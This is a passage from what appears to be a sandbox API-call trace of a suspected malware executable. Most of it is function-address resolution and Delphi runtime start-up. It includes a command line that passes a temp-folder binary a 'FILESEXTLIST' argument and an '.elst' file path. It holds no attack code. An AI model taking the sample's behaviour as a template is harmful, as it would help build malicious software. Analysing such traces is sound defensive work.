(hModule=0x76910000, lpProcName="SetFilePointer") returned 0x7695db36 [0116.431] GetProcAddress 
(hModule=0x76910000, lpProcName="SetEvent") returned 0x7695bccc [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="SetEndOfFile") returned 0x76952319 [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="ResetEvent") returned 0x7695bcb4 [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="ReleaseMutex") returned 0x7695ba72 [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="ReadFile") returned 0x769596fb [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceFrequency") returned 0x769522a7 [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="OpenProcess") returned 0x769559d7 [0116.432] GetProcAddress (hModule=0x76910000, lpProcName="OpenMutexW") returned 0x7696992d [0116.432] GetProcAddress (hModule=0x76910000, lpProcName="LockResource") returned 0x7694fd29 [0116.432] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0116.432] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0116.432] GetProcAddress (hModule=0x76910000, lpProcName="LoadResource") returned 0x7695984d [0116.432] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryW") returned 0x76963c01 [0116.432] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0116.432] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0116.432] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0116.432] GetProcAddress (hModule=0x76910000, lpProcName="HeapFree") returned 0x7695bbd0 [0116.432] GetProcAddress (hModule=0x76910000, lpProcName="HeapDestroy") returned 0x76952301 [0116.432] GetProcAddress (hModule=0x76910000, lpProcName="HeapCreate") returned 0x76963ea2 [0116.432] GetProcAddress 
(hModule=0x76910000, lpProcName="HeapAlloc") returned 0x77282dd6 [0116.432] GetProcAddress (hModule=0x76910000, lpProcName="GetVersionExW") returned 0x76953b1a [0116.432] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0116.432] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadTimes") returned 0x76945bfd [0116.432] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPriority") returned 0x76959147 [0116.432] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadLocale") returned 0x7695153c [0116.432] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemTimes") returned 0x7696d83a [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetShortPathNameW") returned 0x76950bbc [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetProcessTimes") returned 0x7694f626 [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetLocalTime") returned 0x7695a90e [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetFullPathNameW") returned 0x76964543 [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetFileAttributesW") returned 0x769664ff [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetExitCodeThread") returned 0x76946ddd [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetDriveTypeW") returned 0x76963be6 [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceW") returned 
0x76943530 [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetDateFormatW") returned 0x7695afab [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThread") returned 0x76963351 [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcessId") returned 0x7695cac4 [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcess") returned 0x7695cdcf [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetComputerNameA") returned 0x76946ba9 [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfoExW") returned 0x76948b1b [0116.434] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfo") returned 0x76961e2e [0116.434] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0116.434] GetProcAddress (hModule=0x76910000, lpProcName="FreeResource") returned 0x7694f1bd [0116.434] GetProcAddress (hModule=0x76910000, lpProcName="InterlockedCompareExchange") returned 0x7695bb92 [0116.434] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0116.434] GetProcAddress (hModule=0x76910000, lpProcName="FormatMessageW") returned 0x769554a3 [0116.434] GetProcAddress (hModule=0x76910000, lpProcName="FindResourceW") returned 0x76953e61 [0116.434] GetProcAddress (hModule=0x76910000, lpProcName="FindNextFileW") returned 0x7695963a [0116.434] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0116.434] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0116.434] GetProcAddress (hModule=0x76910000, lpProcName="ExpandEnvironmentStringsW") returned 0x76954680 [0116.434] GetProcAddress (hModule=0x76910000, lpProcName="EnumSystemLocalesW") returned 0x7699f3df [0116.434] GetProcAddress (hModule=0x76910000, lpProcName="EnumCalendarInfoW") returned 0x7699f38f [0116.434] GetProcAddress (hModule=0x76910000, 
lpProcName="EnterCriticalSection") returned 0x772777a0 [0116.434] GetProcAddress (hModule=0x76910000, lpProcName="DeleteFileW") returned 0x76950f62 [0116.434] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0116.434] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessW") returned 0x7691204d [0116.434] GetProcAddress (hModule=0x76910000, lpProcName="CreateMutexW") returned 0x76952aee [0116.434] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileW") returned 0x7695cc56 [0116.434] GetProcAddress (hModule=0x76910000, lpProcName="CreateEventW") returned 0x76963386 [0116.435] GetProcAddress (hModule=0x76910000, lpProcName="CreateDirectoryW") returned 0x76953925 [0116.435] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileW") returned 0x769467c3 [0116.435] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0116.435] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0116.435] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0116.435] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0116.435] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0116.435] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0116.435] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0116.435] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0116.435] GetProcAddress (hModule=0x76910000, lpProcName="lstrlenW") returned 0x7695d9e8 [0116.435] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0116.435] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0116.435] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0116.435] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemInfo") returned 0x76963728 
[0116.435] GetProcAddress (hModule=0x76910000, lpProcName="GetVersion") returned 0x7695154e [0116.435] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0116.435] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0116.435] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadLocale") returned 0x769788e6 [0116.435] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemDefaultUILanguage") returned 0x7694731d [0116.435] GetProcAddress (hModule=0x76910000, lpProcName="GetUserDefaultUILanguage") returned 0x769522ef [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="MultiByteToWideChar") returned 0x7696452b [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryExW") returned 0x76954775 [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="GetStartupInfoW") returned 0x76963891 [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineW") returned 0x7696679e [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="UnhandledExceptionFilter") returned 0x7696ed38 [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="RtlUnwind") returned 0x76947f70 [0116.436] GetProcAddress (hModule=0x76910000, 
lpProcName="RaiseException") returned 0x7694eb60 [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="ExitProcess") returned 0x7696214f [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="ExitThread") returned 0x7725f611 [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="CreateThread") returned 0x7696375d [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0116.437] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0116.437] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0116.437] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0116.437] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0116.437] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0116.437] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0116.437] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0116.437] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0116.437] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0116.437] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0116.437] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0116.437] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryA") returned 0x7696395c [0116.437] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0116.437] GetProcAddress (hModule=0x76910000, lpProcName="TlsSetValue") returned 0x7695da88 [0116.437] GetProcAddress (hModule=0x76910000, 
lpProcName="TlsGetValue") returned 0x7695da70 [0116.437] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0116.437] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0116.437] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0116.437] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0116.437] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0116.438] GetProcAddress (hModule=0x769f0000, lpProcName="OpenThreadToken") returned 0x76a0432c [0116.438] GetProcAddress (hModule=0x769f0000, lpProcName="OpenProcessToken") returned 0x76a04304 [0116.438] GetProcAddress (hModule=0x769f0000, lpProcName="GetUserNameA") returned 0x76a1a4b4 [0116.438] GetProcAddress (hModule=0x769f0000, lpProcName="GetTokenInformation") returned 0x76a0431c [0116.438] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthorityCount") returned 0x76a00e0c [0116.438] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthority") returned 0x76a00e24 [0116.438] GetProcAddress (hModule=0x769f0000, lpProcName="FreeSid") returned 0x76a0412e [0116.438] GetProcAddress (hModule=0x769f0000, lpProcName="EqualSid") returned 0x76a0410b [0116.438] GetProcAddress (hModule=0x769f0000, lpProcName="AllocateAndInitializeSid") returned 0x76a040e6 [0116.438] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0116.438] GetProcAddress (hModule=0x769f0000, lpProcName="RegQueryValueExW") returned 0x76a046ad [0116.438] GetProcAddress (hModule=0x769f0000, lpProcName="RegOpenKeyExW") returned 0x76a0468d [0116.438] GetProcAddress (hModule=0x769f0000, lpProcName="RegCloseKey") returned 0x76a0469d [0116.438] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0116.438] GetProcAddress (hModule=0x769f0000, lpProcName="CryptGenRandom") returned 0x769fdfc8 [0116.438] GetProcAddress (hModule=0x769f0000, lpProcName="CryptReleaseContext") returned 
0x769fe124 [0116.438] GetProcAddress (hModule=0x769f0000, lpProcName="CryptAcquireContextW") returned 0x769fdf14 [0116.438] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76750000 [0116.438] GetProcAddress (hModule=0x76750000, lpProcName="CoTaskMemFree") returned 0x767a6f41 [0116.438] GetProcAddress (hModule=0x76750000, lpProcName="StringFromCLSID") returned 0x7676eb17 [0116.439] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstance") returned 0x76799d0b [0116.439] GetProcAddress (hModule=0x76750000, lpProcName="CoUninitialize") returned 0x767986d3 [0116.439] GetProcAddress (hModule=0x76750000, lpProcName="CoInitialize") returned 0x7676b636 [0116.439] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0116.439] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayPtrOfIndex") returned 0x76c2e1ce [0116.439] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetUBound") returned 0x76c2e127 [0116.439] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetLBound") returned 0x76c2e173 [0116.439] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayCreate") returned 0x76c2e263 [0116.439] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeType") returned 0x76c15dee [0116.439] GetProcAddress (hModule=0x76c10000, lpProcName="VariantCopy") returned 0x76c148f1 [0116.439] GetProcAddress (hModule=0x76c10000, lpProcName="VariantClear") returned 0x76c13eae [0116.439] GetProcAddress (hModule=0x76c10000, lpProcName="VariantInit") returned 0x76c13ed5 [0116.439] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0116.439] GetProcAddress (hModule=0x76c10000, lpProcName="GetErrorInfo") returned 0x76c13f21 [0116.439] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0116.439] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0116.439] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0116.439] GetProcAddress (hModule=0x76c10000, 
lpProcName="SysReAllocStringLen") returned 0x76c17810 [0116.439] GetProcAddress (hModule=0x76c10000, lpProcName="SysAllocStringLen") returned 0x76c145d2 [0116.439] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75830000 [0116.439] GetProcAddress (hModule=0x75830000, lpProcName="SHGetSpecialFolderPathW") returned 0x75850468 [0116.440] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0116.440] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0116.440] GetProcAddress (hModule=0x76b40000, lpProcName="CharNextW") returned 0x76b50be6 [0116.440] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0116.440] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0116.440] GetProcAddress (hModule=0x76b40000, lpProcName="PeekMessageW") returned 0x76b5634a [0116.440] GetProcAddress (hModule=0x76b40000, lpProcName="MsgWaitForMultipleObjects") returned 0x76b537d8 [0116.440] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxW") returned 0x76b9ea5f [0116.440] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0116.440] GetProcAddress (hModule=0x76b40000, lpProcName="GetSystemMetrics") returned 0x76b567cf [0116.440] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperBuffW") returned 0x76b5ebd5 [0116.440] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperW") returned 0x76b5e981 [0116.440] GetProcAddress (hModule=0x76b40000, lpProcName="CharLowerBuffW") returned 0x76b53afe [0116.440] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x40) returned 1 [0116.440] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x4) returned 1 [0116.440] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0116.440] SetThreadLocale (Locale=0x400) returned 1 [0116.441] GetVersion () returned 
0x1db10106 [0116.441] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0116.441] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPreferredUILanguages") returned 0x769522d7 [0116.441] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0116.441] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPreferredUILanguages") returned 0x7694e627 [0116.441] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0116.441] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadUILanguage") returned 0x7694ae42 [0116.441] GetSystemInfo (in: lpSystemInfo=0x12fc34 | out: lpSystemInfo=0x12fc34*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0116.441] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" [0116.441] GetStartupInfoW (in: lpStartupInfo=0x12fc10 | out: lpStartupInfo=0x12fc10*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4, hStdOutput=0x200202, hStdError=0x1f80)) [0116.441] GetACP () returned 0x4e4 [0116.441] GetCurrentThreadId () returned 0xdf8 [0116.441] GetVersion () returned 0x1db10106 [0116.441] GetVersionExW (in: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x7728f879, dwMinorVersion=0x7728f99a, dwBuildNumber=0x201d48, dwPlatformId=0x12fbaa, 
szCSDVersion="") | out: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0116.442] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x12da00, nSize=0x20a | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\gym4nxcu.exe")) returned 0x30 [0116.442] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12d7ea, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\gym4nxcu.exe")) returned 0x30 [0116.442] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x1300000 [0116.442] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0116.442] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0116.442] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0116.442] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0116.442] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0116.442] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0116.442] GetUserDefaultUILanguage () returned 0x409 
[0116.443] IsValidLocale (Locale=0x409, dwFlags=0x2) returned 1 [0116.443] GetThreadUILanguage () returned 0x120409 [0116.443] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768) returned 1 [0116.443] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x142a680, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x142a680, pcchLanguagesBuffer=0x12d768) returned 1 [0116.443] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.en-US", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0116.444] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.en", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0116.444] GetUserDefaultUILanguage () returned 0x409 [0116.444] GetLocaleInfoW (in: Locale=0x409, LCType=0x3, lpLCData=0x12d784, cchData=4 | out: lpLCData="ENU") returned 4 [0116.444] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.ENU", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0116.444] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.EN", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0116.444] LoadStringW (in: hInstance=0x400000, uID=0xffc7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffc6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffc5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28 [0116.445] LoadStringW (in: 
hInstance=0x400000, uID=0xffc4, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffc3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffc2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffd6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd 
[0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0116.445] GetVersionExW (in: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, 